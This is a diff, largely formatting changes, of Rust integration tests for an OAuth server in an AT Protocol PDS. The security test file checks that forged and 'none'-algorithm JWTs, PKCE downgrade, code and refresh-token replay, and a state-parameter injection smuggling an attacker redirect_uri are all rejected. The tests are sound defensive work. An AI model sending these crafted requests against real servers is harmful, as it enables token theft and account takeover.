auth_client = no_redirect_client(); ··· 107 114 .send() 108 115 .await 109 116 .expect("Authorize failed"); 110 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 111 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 117 + let location = auth_res 118 + .headers() 119 + .get("location") 120 + .unwrap() 121 + .to_str() 122 + .unwrap(); 123 + let code = location 124 + .split("code=") 125 + .nth(1) 126 + .unwrap() 127 + .split('&') 128 + .next() 129 + .unwrap(); 112 130 let token_res = http_client 113 131 .post(format!("{}/oauth/token", url)) 114 132 .form(&[ ··· 136 154 async fn test_oauth_token_can_create_and_read_records() { 137 155 let url = base_url().await; 138 156 let http_client = client(); 139 - let (session, _mock) = create_user_and_oauth_session( 140 - "oauth-records", 141 - "https://example.com/callback" 142 - ).await; 157 + let (session, _mock) = 158 + create_user_and_oauth_session("oauth-records", "https://example.com/callback").await; 143 159 let collection = "app.bsky.feed.post"; 144 160 let post_text = "Hello from OAuth! This post was created with an OAuth access token."; 145 161 let create_res = http_client ··· 157 173 .send() 158 174 .await 159 175 .expect("createRecord failed"); 160 - assert_eq!(create_res.status(), StatusCode::OK, "Should create record with OAuth token"); 176 + assert_eq!( 177 + create_res.status(), 178 + StatusCode::OK, 179 + "Should create record with OAuth token" 180 + ); 161 181 let create_body: Value = create_res.json().await.unwrap(); 162 182 let uri = create_body["uri"].as_str().unwrap(); 163 183 let rkey = uri.split('/').last().unwrap(); ··· 172 192 .send() 173 193 .await 174 194 .expect("getRecord failed"); 175 - assert_eq!(get_res.status(), StatusCode::OK, "Should read record with OAuth token"); 195 + assert_eq!( 196 + get_res.status(), 197 + StatusCode::OK, 198 + "Should read record with OAuth token" 199 + ); 176 200 let get_body: Value = get_res.json().await.unwrap(); 177 201 assert_eq!(get_body["value"]["text"], post_text); 178 202 } ··· 181 205 async fn test_oauth_token_can_upload_blob() { 182 206 let url = base_url().await; 183 207 let http_client = client(); 184 - let (session, _mock) = create_user_and_oauth_session( 185 - "oauth-blob", 186 - "https://example.com/callback" 187 - ).await; 208 + let (session, _mock) = 209 + create_user_and_oauth_session("oauth-blob", "https://example.com/callback").await; 188 210 let blob_data = b"This is test blob data uploaded via OAuth"; 189 211 let upload_res = http_client 190 212 .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", url)) ··· 194 216 .send() 195 217 .await 196 218 .expect("uploadBlob failed"); 197 - assert_eq!(upload_res.status(), StatusCode::OK, "Should upload blob with OAuth token"); 219 + assert_eq!( 220 + upload_res.status(), 221 + StatusCode::OK, 222 + "Should upload blob with OAuth token" 223 + ); 198 224 let upload_body: Value = upload_res.json().await.unwrap(); 199 225 assert!(upload_body["blob"]["ref"]["$link"].is_string()); 200 226 assert_eq!(upload_body["blob"]["mimeType"], "text/plain"); ··· 204 230 async fn test_oauth_token_can_describe_repo() { 205 231 let url = base_url().await; 206 232 let http_client = client(); 207 - let (session, _mock) = create_user_and_oauth_session( 208 - "oauth-describe", 209 - "https://example.com/callback" 210 - ).await; 233 + let (session, _mock) = 234 + create_user_and_oauth_session("oauth-describe", "https://example.com/callback").await; 211 235 let describe_res = http_client 212 236 .get(format!("{}/xrpc/com.atproto.repo.describeRepo", url)) 213 237 .bearer_auth(&session.access_token) ··· 215 239 .send() 216 240 .await 217 241 .expect("describeRepo failed"); 218 - assert_eq!(describe_res.status(), StatusCode::OK, "Should describe repo with OAuth token"); 242 + assert_eq!( 243 + describe_res.status(), 244 + StatusCode::OK, 245 + "Should describe repo with OAuth token" 246 + ); 219 247 let describe_body: Value = describe_res.json().await.unwrap(); 220 248 assert_eq!(describe_body["did"], session.did); 221 249 assert!(describe_body["handle"].is_string()); ··· 225 253 async fn test_oauth_full_post_lifecycle_create_edit_delete() { 226 254 let url = base_url().await; 227 255 let http_client = client(); 228 - let (session, _mock) = create_user_and_oauth_session( 229 - "oauth-lifecycle", 230 - "https://example.com/callback" 231 - ).await; 256 + let (session, _mock) = 257 + create_user_and_oauth_session("oauth-lifecycle", "https://example.com/callback").await; 232 258 let collection = "app.bsky.feed.post"; 233 259 let original_text = "Original post content"; 234 260 let create_res = http_client ··· 267 293 .send() 268 294 .await 269 295 .unwrap(); 270 - assert_eq!(put_res.status(), StatusCode::OK, "Should update record with OAuth token"); 296 + assert_eq!( 297 + put_res.status(), 298 + StatusCode::OK, 299 + "Should update record with OAuth token" 300 + ); 271 301 let get_res = http_client 272 302 .get(format!("{}/xrpc/com.atproto.repo.getRecord", url)) 273 303 .bearer_auth(&session.access_token) ··· 280 310 .await 281 311 .unwrap(); 282 312 let get_body: Value = get_res.json().await.unwrap(); 283 - assert_eq!(get_body["value"]["text"], updated_text, "Record should have updated text"); 313 + assert_eq!( 314 + get_body["value"]["text"], updated_text, 315 + "Record should have updated text" 316 + ); 284 317 let delete_res = http_client 285 318 .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 286 319 .bearer_auth(&session.access_token) ··· 292 325 .send() 293 326 .await 294 327 .unwrap(); 295 - assert_eq!(delete_res.status(), StatusCode::OK, "Should delete record with OAuth token"); 328 + assert_eq!( 329 + delete_res.status(), 330 + StatusCode::OK, 331 + "Should delete record with OAuth token" 332 + ); 296 333 let get_deleted_res = http_client 297 334 .get(format!("{}/xrpc/com.atproto.repo.getRecord", url)) 298 335 .bearer_auth(&session.access_token) ··· 305 342 .await 306 343 .unwrap(); 307 344 assert!( 308 - get_deleted_res.status() == StatusCode::BAD_REQUEST || get_deleted_res.status() == StatusCode::NOT_FOUND, 345 + get_deleted_res.status() == StatusCode::BAD_REQUEST 346 + || get_deleted_res.status() == StatusCode::NOT_FOUND, 309 347 "Deleted record should not be found, got {}", 310 348 get_deleted_res.status() 311 349 ); ··· 315 353 async fn test_oauth_batch_operations_apply_writes() { 316 354 let url = base_url().await; 317 355 let http_client = client(); 318 - let (session, _mock) = create_user_and_oauth_session( 319 - "oauth-batch", 320 - "https://example.com/callback" 321 - ).await; 356 + let (session, _mock) = 357 + create_user_and_oauth_session("oauth-batch", "https://example.com/callback").await; 322 358 let collection = "app.bsky.feed.post"; 323 359 let now = Utc::now().to_rfc3339(); 324 360 let apply_res = http_client ··· 362 398 .send() 363 399 .await 364 400 .unwrap(); 365 - assert_eq!(apply_res.status(), StatusCode::OK, "Should apply batch writes with OAuth token"); 401 + assert_eq!( 402 + apply_res.status(), 403 + StatusCode::OK, 404 + "Should apply batch writes with OAuth token" 405 + ); 366 406 let list_res = http_client 367 407 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 368 408 .bearer_auth(&session.access_token) 369 - .query(&[ 370 - ("repo", session.did.as_str()), 371 - ("collection", collection), 372 - ]) 409 + .query(&[("repo", session.did.as_str()), ("collection", collection)]) 373 410 .send() 374 411 .await 375 412 .unwrap(); 376 413 assert_eq!(list_res.status(), StatusCode::OK); 377 414 let list_body: Value = list_res.json().await.unwrap(); 378 415 let records = list_body["records"].as_array().unwrap(); 379 - assert!(records.len() >= 3, "Should have at least 3 records from batch"); 416 + assert!( 417 + records.len() >= 3, 418 + "Should have at least 3 records from batch" 419 + ); 380 420 } 381 421 382 422 #[tokio::test] 383 423 async fn test_oauth_token_refresh_maintains_access() { 384 424 let url = base_url().await; 385 425 let http_client = client(); 386 - let (session, _mock) = create_user_and_oauth_session( 387 - "oauth-refresh-access", 388 - "https://example.com/callback" 389 - ).await; 426 + let (session, _mock) = 427 + create_user_and_oauth_session("oauth-refresh-access", "https://example.com/callback").await; 390 428 let collection = "app.bsky.feed.post"; 391 429 let create_res = http_client 392 430 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 403 441 .send() 404 442 .await 405 443 .unwrap(); 406 - assert_eq!(create_res.status(), StatusCode::OK, "Original token should work"); 444 + assert_eq!( 445 + create_res.status(), 446 + StatusCode::OK, 447 + "Original token should work" 448 + ); 407 449 let refresh_res = http_client 408 450 .post(format!("{}/oauth/token", url)) 409 451 .form(&[ ··· 417 459 assert_eq!(refresh_res.status(), StatusCode::OK); 418 460 let refresh_body: Value = refresh_res.json().await.unwrap(); 419 461 let new_access_token = refresh_body["access_token"].as_str().unwrap(); 420 - assert_ne!(new_access_token, session.access_token, "New token should be different"); 462 + assert_ne!( 463 + new_access_token, session.access_token, 464 + "New token should be different" 465 + ); 421 466 let create_res2 = http_client 422 467 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 423 468 .bearer_auth(new_access_token) ··· 433 478 .send() 434 479 .await 435 480 .unwrap(); 436 - assert_eq!(create_res2.status(), StatusCode::OK, "New token should work for creating records"); 481 + assert_eq!( 482 + create_res2.status(), 483 + StatusCode::OK, 484 + "New token should work for creating records" 485 + ); 437 486 let list_res = http_client 438 487 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 439 488 .bearer_auth(new_access_token) 440 - .query(&[ 441 - ("repo", session.did.as_str()), 442 - ("collection", collection), 443 - ]) 489 + .query(&[("repo", session.did.as_str()), ("collection", collection)]) 444 490 .send() 445 491 .await 446 492 .unwrap(); 447 - assert_eq!(list_res.status(), StatusCode::OK, "New token should work for listing records"); 493 + assert_eq!( 494 + list_res.status(), 495 + StatusCode::OK, 496 + "New token should work for listing records" 497 + ); 448 498 let list_body: Value = list_res.json().await.unwrap(); 449 499 let records = list_body["records"].as_array().unwrap(); 450 500 assert_eq!(records.len(), 2, "Should have both posts"); ··· 454 504 async fn test_oauth_revoked_token_cannot_access_resources() { 455 505 let url = base_url().await; 456 506 let http_client = client(); 457 - let (session, _mock) = create_user_and_oauth_session( 458 - "oauth-revoke-access", 459 - "https://example.com/callback" 460 - ).await; 507 + let (session, _mock) = 508 + create_user_and_oauth_session("oauth-revoke-access", "https://example.com/callback").await; 461 509 let collection = "app.bsky.feed.post"; 462 510 let create_res = http_client 463 511 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 474 522 .send() 475 523 .await 476 524 .unwrap(); 477 - assert_eq!(create_res.status(), StatusCode::OK, "Token should work before revocation"); 525 + assert_eq!( 526 + create_res.status(), 527 + StatusCode::OK, 528 + "Token should work before revocation" 529 + ); 478 530 let revoke_res = http_client 479 531 .post(format!("{}/oauth/revoke", url)) 480 532 .form(&[("token", session.refresh_token.as_str())]) 481 533 .send() 482 534 .await 483 535 .unwrap(); 484 - assert_eq!(revoke_res.status(), StatusCode::OK, "Revocation should succeed"); 536 + assert_eq!( 537 + revoke_res.status(), 538 + StatusCode::OK, 539 + "Revocation should succeed" 540 + ); 485 541 let refresh_res = http_client 486 542 .post(format!("{}/oauth/token", url)) 487 543 .form(&[ ··· 492 548 .send() 493 549 .await 494 550 .unwrap(); 495 - assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work"); 551 + assert_eq!( 552 + refresh_res.status(), 553 + StatusCode::BAD_REQUEST, 554 + "Revoked refresh token should not work" 555 + ); 496 556 } 497 557 498 558 #[tokio::test] ··· 548 608 .send() 549 609 .await 550 610 .unwrap(); 551 - let location1 = auth_res1.headers().get("location").unwrap().to_str().unwrap(); 552 - let code1 = location1.split("code=").nth(1).unwrap().split('&').next().unwrap(); 611 + let location1 = auth_res1 612 + .headers() 613 + .get("location") 614 + .unwrap() 615 + .to_str() 616 + .unwrap(); 617 + let code1 = location1 618 + .split("code=") 619 + .nth(1) 620 + .unwrap() 621 + .split('&') 622 + .next() 623 + .unwrap(); 553 624 let token_res1 = http_client 554 625 .post(format!("{}/oauth/token", url)) 555 626 .form(&[ ··· 590 661 .send() 591 662 .await 592 663 .unwrap(); 593 - let location2 = auth_res2.headers().get("location").unwrap().to_str().unwrap(); 594 - let code2 = location2.split("code=").nth(1).unwrap().split('&').next().unwrap(); 664 + let location2 = auth_res2 665 + .headers() 666 + .get("location") 667 + .unwrap() 668 + .to_str() 669 + .unwrap(); 670 + let code2 = location2 671 + .split("code=") 672 + .nth(1) 673 + .unwrap() 674 + .split('&') 675 + .next() 676 + .unwrap(); 595 677 let token_res2 = http_client 596 678 .post(format!("{}/oauth/token", url)) 597 679 .form(&[ ··· 606 688 .unwrap(); 607 689 let token_body2: Value = token_res2.json().await.unwrap(); 608 690 let token2 = token_body2["access_token"].as_str().unwrap(); 609 - assert_ne!(token1, token2, "Different clients should get different tokens"); 691 + assert_ne!( 692 + token1, token2, 693 + "Different clients should get different tokens" 694 + ); 610 695 let collection = "app.bsky.feed.post"; 611 696 let create_res1 = http_client 612 697 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 623 708 .send() 624 709 .await 625 710 .unwrap(); 626 - assert_eq!(create_res1.status(), StatusCode::OK, "Client 1 token should work"); 711 + assert_eq!( 712 + create_res1.status(), 713 + StatusCode::OK, 714 + "Client 1 token should work" 715 + ); 627 716 let create_res2 = http_client 628 717 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 629 718 .bearer_auth(token2) ··· 639 728 .send() 640 729 .await 641 730 .unwrap(); 642 - assert_eq!(create_res2.status(), StatusCode::OK, "Client 2 token should work"); 731 + assert_eq!( 732 + create_res2.status(), 733 + StatusCode::OK, 734 + "Client 2 token should work" 735 + ); 643 736 let list_res = http_client 644 737 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 645 738 .bearer_auth(token1) 646 - .query(&[ 647 - ("repo", user_did), 648 - ("collection", collection), 649 - ]) 739 + .query(&[("repo", user_did), ("collection", collection)]) 650 740 .send() 651 741 .await 652 742 .unwrap(); 653 743 let list_body: Value = list_res.json().await.unwrap(); 654 744 let records = list_body["records"].as_array().unwrap(); 655 - assert_eq!(records.len(), 2, "Both posts should be visible to either client"); 745 + assert_eq!( 746 + records.len(), 747 + 2, 748 + "Both posts should be visible to either client" 749 + ); 656 750 } 657 751 658 752 #[tokio::test] 659 753 async fn test_oauth_social_interactions_follow_like_repost() { 660 754 let url = base_url().await; 661 755 let http_client = client(); 662 - let (alice, _mock_alice) = create_user_and_oauth_session( 663 - "alice-social", 664 - "https://alice-app.example.com/callback" 665 - ).await; 666 - let (bob, _mock_bob) = create_user_and_oauth_session( 667 - "bob-social", 668 - "https://bob-app.example.com/callback" 669 - ).await; 756 + let (alice, _mock_alice) = 757 + create_user_and_oauth_session("alice-social", "https://alice-app.example.com/callback") 758 + .await; 759 + let (bob, _mock_bob) = 760 + create_user_and_oauth_session("bob-social", "https://bob-app.example.com/callback").await; 670 761 let post_collection = "app.bsky.feed.post"; 671 762 let post_res = http_client 672 763 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 703 794 .send() 704 795 .await 705 796 .unwrap(); 706 - assert_eq!(follow_res.status(), StatusCode::OK, "Bob should be able to follow Alice via OAuth"); 797 + assert_eq!( 798 + follow_res.status(), 799 + StatusCode::OK, 800 + "Bob should be able to follow Alice via OAuth" 801 + ); 707 802 let like_collection = "app.bsky.feed.like"; 708 803 let like_res = http_client 709 804 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 723 818 .send() 724 819 .await 725 820 .unwrap(); 726 - assert_eq!(like_res.status(), StatusCode::OK, "Bob should be able to like Alice's post via OAuth"); 821 + assert_eq!( 822 + like_res.status(), 823 + StatusCode::OK, 824 + "Bob should be able to like Alice's post via OAuth" 825 + ); 727 826 let repost_collection = "app.bsky.feed.repost"; 728 827 let repost_res = http_client 729 828 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 743 842 .send() 744 843 .await 745 844 .unwrap(); 746 - assert_eq!(repost_res.status(), StatusCode::OK, "Bob should be able to repost Alice's post via OAuth"); 845 + assert_eq!( 846 + repost_res.status(), 847 + StatusCode::OK, 848 + "Bob should be able to repost Alice's post via OAuth" 849 + ); 747 850 let bob_follows = http_client 748 851 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 749 852 .bearer_auth(&bob.access_token) ··· 761 864 let bob_likes = http_client 762 865 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 763 866 .bearer_auth(&bob.access_token) 764 - .query(&[ 765 - ("repo", bob.did.as_str()), 766 - ("collection", like_collection), 767 - ]) 867 + .query(&[("repo", bob.did.as_str()), ("collection", like_collection)]) 768 868 .send() 769 869 .await 770 870 .unwrap(); ··· 777 877 async fn test_oauth_cannot_modify_other_users_repo() { 778 878 let url = base_url().await; 779 879 let http_client = client(); 780 - let (alice, _mock_alice) = create_user_and_oauth_session( 781 - "alice-boundary", 782 - "https://alice.example.com/callback" 783 - ).await; 784 - let (bob, _mock_bob) = create_user_and_oauth_session( 785 - "bob-boundary", 786 - "https://bob.example.com/callback" 787 - ).await; 880 + let (alice, _mock_alice) = 881 + create_user_and_oauth_session("alice-boundary", "https://alice.example.com/callback").await; 882 + let (bob, _mock_bob) = 883 + create_user_and_oauth_session("bob-boundary", "https://bob.example.com/callback").await; 788 884 let collection = "app.bsky.feed.post"; 789 885 let malicious_res = http_client 790 886 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 809 905 let alice_posts = http_client 810 906 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 811 907 .bearer_auth(&alice.access_token) 812 - .query(&[ 813 - ("repo", alice.did.as_str()), 814 - ("collection", collection), 815 - ]) 908 + .query(&[("repo", alice.did.as_str()), ("collection", collection)]) 816 909 .send() 817 910 .await 818 911 .unwrap(); ··· 825 918 async fn test_oauth_session_isolation_between_users() { 826 919 let url = base_url().await; 827 920 let http_client = client(); 828 - let (alice, _mock_alice) = create_user_and_oauth_session( 829 - "alice-isolation", 830 - "https://alice.example.com/callback" 831 - ).await; 832 - let (bob, _mock_bob) = create_user_and_oauth_session( 833 - "bob-isolation", 834 - "https://bob.example.com/callback" 835 - ).await; 921 + let (alice, _mock_alice) = 922 + create_user_and_oauth_session("alice-isolation", "https://alice.example.com/callback") 923 + .await; 924 + let (bob, _mock_bob) = 925 + create_user_and_oauth_session("bob-isolation", "https://bob.example.com/callback").await; 836 926 let collection = "app.bsky.feed.post"; 837 927 let alice_post = http_client 838 928 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) ··· 869 959 let alice_list = http_client 870 960 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 871 961 .bearer_auth(&alice.access_token) 872 - .query(&[ 873 - ("repo", alice.did.as_str()), 874 - ("collection", collection), 875 - ]) 962 + .query(&[("repo", alice.did.as_str()), ("collection", collection)]) 876 963 .send() 877 964 .await 878 965 .unwrap(); ··· 883 970 let bob_list = http_client 884 971 .get(format!("{}/xrpc/com.atproto.repo.listRecords", url)) 885 972 .bearer_auth(&bob.access_token) 886 - .query(&[ 887 - ("repo", bob.did.as_str()), 888 - ("collection", collection), 889 - ]) 973 + .query(&[("repo", bob.did.as_str()), ("collection", collection)]) 890 974 .send() 891 975 .await 892 976 .unwrap(); ··· 900 984 async fn test_oauth_token_works_with_sync_endpoints() { 901 985 let url = base_url().await; 902 986 let http_client = client(); 903 - let (session, _mock) = create_user_and_oauth_session( 904 - "oauth-sync", 905 - "https://example.com/callback" 906 - ).await; 987 + let (session, _mock) = 988 + create_user_and_oauth_session("oauth-sync", "https://example.com/callback").await; 907 989 let collection = "app.bsky.feed.post"; 908 990 http_client 909 991 .post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
+256 -75
tests/oauth_security.rs
··· 3 3 mod common; 4 4 mod helpers; 5 5 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 6 - use bspds::oauth::dpop::{DPoPVerifier, DPoPJwk, compute_jwk_thumbprint}; 6 + use bspds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint}; 7 7 use chrono::Utc; 8 8 use common::{base_url, client}; 9 9 use helpers::verify_new_account; 10 - use reqwest::{redirect, StatusCode}; 11 - use serde_json::{json, Value}; 10 + use reqwest::{StatusCode, redirect}; 11 + use serde_json::{Value, json}; 12 12 use sha2::{Digest, Sha256}; 13 - use wiremock::{Mock, MockServer, ResponseTemplate}; 14 13 use wiremock::matchers::{method, path}; 14 + use wiremock::{Mock, MockServer, ResponseTemplate}; 15 15 16 16 fn no_redirect_client() -> reqwest::Client { 17 17 reqwest::Client::builder() ··· 50 50 mock_server 51 51 } 52 52 53 - async fn get_oauth_tokens( 54 - http_client: &reqwest::Client, 55 - url: &str, 56 - ) -> (String, String, String) { 53 + async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) { 57 54 let ts = Utc::now().timestamp_millis(); 58 55 let handle = format!("sec-test-{}", ts); 59 56 let email = format!("sec-test-{}@example.com", ts); ··· 100 97 .send() 101 98 .await 102 99 .unwrap(); 103 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 104 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 100 + let location = auth_res 101 + .headers() 102 + .get("location") 103 + .unwrap() 104 + .to_str() 105 + .unwrap(); 106 + let code = location 107 + .split("code=") 108 + .nth(1) 109 + .unwrap() 110 + .split('&') 111 + .next() 112 + .unwrap(); 105 113 let token_body: Value = http_client 106 114 .post(format!("{}/oauth/token", url)) 107 115 .form(&[ ··· 137 145 .send() 138 146 .await 139 147 .unwrap(); 140 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 148 + assert_eq!( 149 + res.status(), 150 + StatusCode::UNAUTHORIZED, 151 + "Forged signature should be rejected" 152 + ); 141 153 } 142 154 143 155 #[tokio::test] ··· 157 169 .send() 158 170 .await 159 171 .unwrap(); 160 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 172 + assert_eq!( 173 + res.status(), 174 + StatusCode::UNAUTHORIZED, 175 + "Modified payload should be rejected" 176 + ); 161 177 } 162 178 163 179 #[tokio::test] ··· 186 202 .send() 187 203 .await 188 204 .unwrap(); 189 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected"); 205 + assert_eq!( 206 + res.status(), 207 + StatusCode::UNAUTHORIZED, 208 + "Algorithm 'none' attack should be rejected" 209 + ); 190 210 } 191 211 192 212 #[tokio::test] ··· 215 235 .send() 216 236 .await 217 237 .unwrap(); 218 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected"); 238 + assert_eq!( 239 + res.status(), 240 + StatusCode::UNAUTHORIZED, 241 + "Algorithm substitution attack should be rejected" 242 + ); 219 243 } 220 244 221 245 #[tokio::test] ··· 244 268 .send() 245 269 .await 246 270 .unwrap(); 247 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 271 + assert_eq!( 272 + res.status(), 273 + StatusCode::UNAUTHORIZED, 274 + "Expired token should be rejected" 275 + ); 248 276 } 249 277 250 278 #[tokio::test] ··· 266 294 .send() 267 295 .await 268 296 .unwrap(); 269 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected"); 297 + assert_eq!( 298 + res.status(), 299 + StatusCode::BAD_REQUEST, 300 + "PKCE plain method should be rejected" 301 + ); 270 302 let body: Value = res.json().await.unwrap(); 271 303 assert_eq!(body["error"], "invalid_request"); 272 304 assert!( 273 - body["error_description"].as_str().unwrap().to_lowercase().contains("s256"), 305 + body["error_description"] 306 + .as_str() 307 + .unwrap() 308 + .to_lowercase() 309 + .contains("s256"), 274 310 "Error should mention S256 requirement" 275 311 ); 276 312 } ··· 292 328 .send() 293 329 .await 294 330 .unwrap(); 295 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 331 + assert_eq!( 332 + res.status(), 333 + StatusCode::BAD_REQUEST, 334 + "Missing PKCE challenge should be rejected" 335 + ); 296 336 } 297 337 298 338 #[tokio::test] ··· 346 386 .send() 347 387 .await 348 388 .unwrap(); 349 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 350 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 389 + let location = auth_res 390 + .headers() 391 + .get("location") 392 + .unwrap() 393 + .to_str() 394 + .unwrap(); 395 + let code = location 396 + .split("code=") 397 + .nth(1) 398 + .unwrap() 399 + .split('&') 400 + .next() 401 + .unwrap(); 351 402 let token_res = http_client 352 403 .post(format!("{}/oauth/token", url)) 353 404 .form(&[ ··· 360 411 .send() 361 412 .await 362 413 .unwrap(); 363 - assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected"); 414 + assert_eq!( 415 + token_res.status(), 416 + StatusCode::BAD_REQUEST, 417 + "Wrong PKCE verifier should be rejected" 418 + ); 364 419 let body: Value = token_res.json().await.unwrap(); 365 420 assert_eq!(body["error"], "invalid_grant"); 366 421 } ··· 415 470 .send() 416 471 .await 417 472 .unwrap(); 418 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 419 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 473 + let location = auth_res 474 + .headers() 475 + .get("location") 476 + .unwrap() 477 + .to_str() 478 + .unwrap(); 479 + let code = location 480 + .split("code=") 481 + .nth(1) 482 + .unwrap() 483 + .split('&') 484 + .next() 485 + .unwrap(); 420 486 let stolen_code = code.to_string(); 421 487 let first_res = http_client 422 488 .post(format!("{}/oauth/token", url)) ··· 430 496 .send() 431 497 .await 432 498 .unwrap(); 433 - assert_eq!(first_res.status(), StatusCode::OK, "First use should succeed"); 499 + assert_eq!( 500 + first_res.status(), 501 + StatusCode::OK, 502 + "First use should succeed" 503 + ); 434 504 let replay_res = http_client 435 505 .post(format!("{}/oauth/token", url)) 436 506 .form(&[ ··· 443 513 .send() 444 514 .await 445 515 .unwrap(); 446 - assert_eq!(replay_res.status(), StatusCode::BAD_REQUEST, "Replay attack should fail"); 516 + assert_eq!( 517 + replay_res.status(), 518 + StatusCode::BAD_REQUEST, 519 + "Replay attack should fail" 520 + ); 447 521 let body: Value = replay_res.json().await.unwrap(); 448 522 assert_eq!(body["error"], "invalid_grant"); 449 523 } ··· 498 572 .send() 499 573 .await 500 574 .unwrap(); 501 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 502 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 575 + let location = auth_res 576 + .headers() 577 + .get("location") 578 + .unwrap() 579 + .to_str() 580 + .unwrap(); 581 + let code = location 582 + .split("code=") 583 + .nth(1) 584 + .unwrap() 585 + .split('&') 586 + .next() 587 + .unwrap(); 503 588 let token_body: Value = http_client 504 589 .post(format!("{}/oauth/token", url)) 505 590 .form(&[ ··· 529 614 .json() 530 615 .await 531 616 .unwrap(); 532 - assert!(first_refresh["access_token"].is_string(), "First refresh should succeed"); 617 + assert!( 618 + first_refresh["access_token"].is_string(), 619 + "First refresh should succeed" 620 + ); 533 621 let new_refresh_token = first_refresh["refresh_token"].as_str().unwrap(); 534 622 let replay_res = http_client 535 623 .post(format!("{}/oauth/token", url)) ··· 541 629 .send() 542 630 .await 543 631 .unwrap(); 544 - assert_eq!(replay_res.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail"); 632 + assert_eq!( 633 + replay_res.status(), 634 + StatusCode::BAD_REQUEST, 635 + "Refresh token replay should fail" 636 + ); 545 637 let body: Value = replay_res.json().await.unwrap(); 546 638 assert_eq!(body["error"], "invalid_grant"); 547 639 assert!( 548 - body["error_description"].as_str().unwrap().to_lowercase().contains("reuse"), 640 + body["error_description"] 641 + .as_str() 642 + .unwrap() 643 + .to_lowercase() 644 + .contains("reuse"), 549 645 "Error should mention token reuse" 550 646 ); 551 647 let family_revoked_res = http_client ··· 586 682 .send() 587 683 .await 588 684 .unwrap(); 589 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 685 + assert_eq!( 686 + res.status(), 687 + StatusCode::BAD_REQUEST, 688 + "Unregistered redirect_uri should be rejected" 689 + ); 590 690 } 591 691 592 692 #[tokio::test] ··· 651 751 .send() 652 752 .await 653 753 .unwrap(); 654 - assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked from OAuth"); 754 + assert_eq!( 755 + auth_res.status(), 756 + StatusCode::FORBIDDEN, 757 + "Deactivated account should be blocked from OAuth" 758 + ); 655 759 let body: Value = auth_res.json().await.unwrap(); 656 760 assert_eq!(body["error"], "access_denied"); 657 761 } ··· 708 812 .send() 709 813 .await 710 814 .unwrap(); 711 - assert!(auth_res.status().is_redirection(), "Should redirect successfully"); 712 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 815 + assert!( 816 + auth_res.status().is_redirection(), 817 + "Should redirect successfully" 818 + ); 819 + let location = auth_res 820 + .headers() 821 + .get("location") 822 + .unwrap() 823 + .to_str() 824 + .unwrap(); 713 825 assert!( 714 826 location.starts_with(redirect_uri), 715 827 "Redirect should go to registered URI, not attacker URI. Got: {}", ··· 721 833 "State injection should not add extra redirect_uri parameters" 722 834 ); 723 835 assert!( 724 - location.contains(&urlencoding::encode(malicious_state).to_string()) || 725 - location.contains("state=state%26redirect_uri"), 836 + location.contains(&urlencoding::encode(malicious_state).to_string()) 837 + || location.contains("state=state%26redirect_uri"), 726 838 "State parameter should be properly URL-encoded. Got: {}", 727 839 location 728 840 ); ··· 781 893 .send() 782 894 .await 783 895 .unwrap(); 784 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 785 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 896 + let location = auth_res 897 + .headers() 898 + .get("location") 899 + .unwrap() 900 + .to_str() 901 + .unwrap(); 902 + let code = location 903 + .split("code=") 904 + .nth(1) 905 + .unwrap() 906 + .split('&') 907 + .next() 908 + .unwrap(); 786 909 let token_res = http_client 787 910 .post(format!("{}/oauth/token", url)) 788 911 .form(&[ ··· 803 926 let body: Value = token_res.json().await.unwrap(); 804 927 assert_eq!(body["error"], "invalid_grant"); 805 928 assert!( 806 - 